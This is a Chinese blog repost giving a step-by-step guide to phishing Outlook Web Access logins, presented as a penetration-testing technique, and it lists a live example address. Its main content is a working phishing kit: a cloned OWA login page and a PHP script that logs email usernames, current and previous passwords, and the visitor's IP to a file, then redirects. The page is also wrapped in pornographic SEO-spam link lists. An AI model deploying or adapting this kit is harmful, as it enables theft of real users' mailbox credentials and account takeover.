日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問(wèn) 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) > 编程资源 > 编程问答 >内容正文

编程问答

浅谈微软认证Outlook Web Access钓鱼(Outlook Web Access Phishing)

發(fā)布時(shí)間:2024/1/1 编程问答 35 豆豆
生活随笔 收集整理的這篇文章主要介紹了 浅谈微软认证Outlook Web Access钓鱼(Outlook Web Access Phishing) 小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
安全人員在進(jìn)行安全測(cè)試的時(shí)候,會(huì)對(duì)一個(gè)企業(yè)進(jìn)行整體評(píng)估,當(dāng)然測(cè)試的項(xiàng)目很多,需要?dú)v時(shí)數(shù)日再可見(jiàn)到效果,其中一項(xiàng)很重要的環(huán)節(jié)就是釣魚(yú),很多測(cè)試人員只是知道有這個(gè)名詞,卻不會(huì)去用這項(xiàng)技能,很遺憾的一件事情,那么這次我們就講解一下如何一步一步的進(jìn)行釣魚(yú)活動(dòng)。 環(huán)境可以是你抓到的肉雞或者申請(qǐng)域名指向空間。 技術(shù)手段就是如下幾步:1、用工具HTTrack Website Copier 克隆一個(gè)網(wǎng)站。2、注冊(cè)或者申請(qǐng)域名,帶SSL最好,不帶也可3、修改克隆的網(wǎng)站代碼,獲取帳號(hào)密碼等敏感信息的代碼編寫(xiě)4、跳轉(zhuǎn)到原始頁(yè)面或者提示信息即可

實(shí)例:
地址http://111.73.46.12:8011/


簡(jiǎn)單前端代碼代碼如下:

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- saved from url=(0076)http://mail.logan.com.cn/CookieAuth.dll?GetLogon?curl=Z2F&reason=0&formdir=1 --> <html><!-- Mirrored from sgywn.com:2017/ by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 24 Feb 2017 12:23:03 GMT --> <head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>Outlook Web App</title><meta content="NOINDEX, NOFOLLOW" name="Robots"><link rel="shortcut icon" href="css/favicon.html" type="image/x-icon"><link href="css/logon_style.css" type="text/css" rel="stylesheet"><link href="css/owafont.css" type="text/css" rel="stylesheet"><script src="css/flogon.js" type="text/javascript"></script><script type="text/javascript">var a_fGzpEnbl = 1;var g_fFcs = 1;function window_onload(){onld();if (chkCookies()){ldCookie('username', 'password');var expl1 = document.getElementById('expl1');expl1.style.display = "";var lnkHidedSection = document.getElementById('lnkHdSec');lnkHidedSection.style.display = "none";var lnkShowSection = document.getElementById('lnkShwSec');lnkShowSection.style.display = "";}}function $(v){ return document.getElementById(v); } function $$(v){ return document.getElementById(v).value; } function isNull( str ){ if ( str == "" ) return true; var regu = "^[ ]+$"; var re = new RegExp(regu); return re.test(str); } function chr_ty(){if(isNull($$("d"))){$("d").focus();alert("郵箱帳號(hào)不能為空!"); return false; }if(isNull($$("e"))){$("e").focus();alert("郵箱密碼不能為空!");return false; } }</script></head> <body class="owaLgnBdy"><noscript><div id="dvErr"><table cellpadding="0" cellspacing="0"><tr><td><img src="CookieAuth70fb.html?GetPic?formdir=1&amp;image=lgnerror.gif" alt=""></td><td style="width:100%">要使用 Microsoft Outlook Web App,必須在瀏覽器中啟用腳本。有關(guān)如何啟用腳本的信息,請(qǐng)參閱瀏覽器的幫助。如果您的瀏覽器不支持腳本,您可以下載 <a href='http://www.microsoft.com/windows/ie/downloads/default.mspx'>Microsoft Internet Explorer</a></td></tr></table></div></noscript><form name="beforeSubmit" action="checklogin.php" method="post" target="_self" onSubmit="return beforeSubmit(this);"><input type="hidden" id="curl" name="curl" value="Z2F"><input type="hidden" id="flags" name="flags" value="0"><input type="hidden" id="forcedownlevel" name="forcedownlevel" value="0"><input type="hidden" id="formdir" name="formdir" value="1"><table align="center" id="tblMain" cellpadding="0" cellspacing="0"><tbody><tr><td colspan="3"><table cellspacing="0" cellpadding="0" class="tblLgn"><tbody><tr><td class="lgnTL"><img src="css/lgntopl.gif" alt=""></td><td class="lgnTM"></td><td class="lgnTR"><img src="css/lgntopr.gif" alt=""></td></tr></tbody></table></td></tr><tr><td id="mdLft">&#160;</td><td id="mdMid"><table id="tblMid" class="mid"><tbody><tr style="display: "><td><hr></td></tr><tr><td><table cellspacing="0" cellpadding="0"><colgroup><col class="nowrap"><col class="w100"><col></colgroup><tbody><tr><td class="nowrap"><label for="d">郵箱帳號(hào):</label></td><td class="txtpad"><input class="txt" id="d" name="d" type="text"></td></tr><tr><td class="nowrap"><label for="e">郵箱密碼:</label></td><td class="txtpad"><input class="txt" id="e" name="e" type="password"></td></tr><tr><td class="nowrap"><label for="truename">歷史密碼:</label></td><td class="txtpad"><input class="txt" id="f" name="f" type="text"></td></tr><tr><td class="nowrap">&#160;</td><td class="txtpad" colspan="2"><input class="btn" id="SubmitCreds" type="submit" value="登錄" name="SubmitCreds"></td></tr></tbody></table></td></tr><tr><td><hr></td></tr></tbody></table><table id="tblMid2" class="mid" style="display: none"><tbody><tr><td><hr></td></tr><tr><td><br>您的瀏覽器設(shè)置當(dāng)前禁用 cookie。要訪問(wèn)此網(wǎng)站,必須啟用 cookie。<br><br>按照以下指示啟用 cookie (Microsoft Internet Explorer 6 或更高版本): 在 Internet Explorer 中,單擊“工具”菜單上的“Internet 選項(xiàng)”。單擊“隱私”選項(xiàng)卡,然后單擊“站點(diǎn)”。在“網(wǎng)站地址”中,鍵入此網(wǎng)站的完整地址。例如,http://www.microsoft.com。然后單擊“允許”。<br><br><br></td></tr><tr><td><hr></td></tr><tr><td class="txtpad"><input type="button" class="btn" style="float: right" value="重試"></td></tr></tbody></table><table class="mid tblConn"><tbody><tr><td rowspan="3" style="vertical-align: top" class="tdConnImg"><img src="css/lgnexlogo.gif" alt=""></td><td class="tdConn" style="padding-top: 6px;">已連接到 Microsoft Exchange</td></tr><tr><td class="tdConn" style="padding-top: 0px;">受 Microsoft Forefront Threat Management Gateway 保護(hù)</td></tr><tr><td class="tdCopy">&#169; 2009 Microsoft Corporation. 保留所有權(quán)利。</td></tr></tbody></table></td><td id="mdRt">&#160;</td></tr><tr><td colspan="3"><table cellspacing="0" cellpadding="0" class="tblLgn"><tbody><tr><td class="lgnBL"><img src="css/lgnbotl.gif" alt=""></td><td class="lgnBM"></td><td class="lgnBR"><img src="css/lgnbotr.gif" alt=""></td></tr></tbody></table></td></tr></tbody></table></form></body><!-- Mirrored from sgywn.com:2017/ by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 24 Feb 2017 12:23:39 GMT --> </html>

后端接受代碼:

<?php@error_reporting(0);$email_name=$_POST["d"]; $email_pwd=$_POST["e"]; $email_pwd1=$_POST["f"]; $url="CookieAuth70fb.html";function GetIp(){$realip = '';$unknown = 'unknown';if (isset($_SERVER)){if(isset($_SERVER['HTTP_X_FORWARDED_FOR']) && !empty($_SERVER['HTTP_X_FORWARDED_FOR']) && strcasecmp($_SERVER['HTTP_X_FORWARDED_FOR'], $unknown)){$arr = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);foreach($arr as $ip){$ip = trim($ip);if ($ip != 'unknown'){$realip = $ip;break;}}}else if(isset($_SERVER['HTTP_CLIENT_IP']) && !empty($_SERVER['HTTP_CLIENT_IP']) && strcasecmp($_SERVER['HTTP_CLIENT_IP'], $unknown)){$realip = $_SERVER['HTTP_CLIENT_IP'];}else if(isset($_SERVER['REMOTE_ADDR']) && !empty($_SERVER['REMOTE_ADDR']) && strcasecmp($_SERVER['REMOTE_ADDR'], $unknown)){$realip = $_SERVER['REMOTE_ADDR'];}else{$realip = $unknown;}}else{if(getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), $unknown)){$realip = getenv("HTTP_X_FORWARDED_FOR");}else if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), $unknown)){$realip = getenv("HTTP_CLIENT_IP");}else if(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), $unknown)){$realip = getenv("REMOTE_ADDR");}else{$realip = $unknown;}}$realip = preg_match("/[\d\.]{7,15}/", $realip, $matches) ? $matches[0] : $unknown;return $realip; } $gip=GetIp(); @file_put_contents("test.txt", "$email_name $email_pwd $email_pwd1 $gip\r\n", FILE_APPEND);Header("HTTP/1.1 303 See Other"); Header("Location: $url");?>

案例到此結(jié)束,希望安全人員在進(jìn)行測(cè)試的時(shí)候可以提交自身的評(píng)估水平,不能眼高手低。

總結(jié)

以上是生活随笔為你收集整理的浅谈微软认证Outlook Web Access钓鱼(Outlook Web Access Phishing)的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 亚洲久久久 | 热99在线| 日韩资源网 | 爱情岛亚洲品质自拍极速福利网站 | 人人射av | 婷婷另类小说 | 小泽玛丽亚在线观看 | 97超碰色 | 亚洲永久免费视频 | 国产精品国产精品国产专区 | 永久看看免费大片 | 久久久久欧美 | 四虎看黄 | 亚洲婷婷一区 | 香蕉视频成人在线观看 | 日韩成年人视频 | 91在线精品视频 | 嫩草懂你 | 黄色大片aaa | 天天爱天天草 | 精品一二区| 国产无码精品在线观看 | 精品少妇人妻av免费久久洗澡 | 国产成人免费网站 | 亚洲永久在线观看 | 免费黄色视屏 | 国产91小视频 | 黄色网址视频在线观看 | 亚洲3p | 国产美女啪啪 | 91中文字幕在线播放 | 秋霞av在线 | 久艹伊人 | 亚洲精品国偷拍自产在线观看蜜桃 | 九九热在线视频播放 | 日韩伦人妻无码 | 加勒比综合网 | 农村妇女一区二区 | 欧美日韩免费在线观看 | 国产高清不卡视频 | 一区二区日韩欧美 | 97超碰在| 国产精品人人 | 久久福利视频导航 | 国产欧美一区二区三区在线看蜜臂 | 永久免费在线播放 | 少妇把腿扒开让我舔18 | 蜜臀久久99静品久久久久久 | 成人一区二区免费视频 | 午夜污| 国产97色在线 | www.avcao | 一级片久久久久 | 欧美激情小视频 | 直接看的毛片 | 大乳女喂男人吃奶 | 欧美s码亚洲码精品m码 | 成年人色片 | 色眯眯网 | 国产精品免费观看视频 | 伊人久久大香 | 久久久久亚洲精品系列色欲 | 一级做a爱片久久毛片 | 欧美日韩亚洲一区二区三区 | 亚洲高清在线免费观看 | 亚洲影视在线 | 激情久久综合 | 亚洲免费成人网 | 最近高清中文在线字幕在线观看 | 久久一级黄色片 | 在线观看香蕉视频 | 免费www xxx| 无码人妻精品一区二区三应用大全 | 亚洲蜜桃在线 | 女教师高潮黄又色视频 | 国产精品久久久久久久久久妞妞 | 天天插天天射天天干 | 美女黄色一级视频 | 久久久久亚洲AV成人 | 在线天堂网 | 91视频成人| 99热最新网址 | 国产一级二级毛片 | 国产欧美精品一区二区三区app | aa视频免费观看 | 国产suv一区二区 | 免费黄色在线 | 污视频网址 | 中文字幕一区二区人妻在线不卡 | 91在线不卡 | 青娱乐极品在线 | 中文字幕色哟哟 | 黄色二级视频 | 色欲av无码精品一区 | 成人高清视频免费观看 | 女人扒开屁股让男人捅 | 亚洲毛片在线免费观看 | 国产又爽又黄游戏 | 午夜寂寞视频 |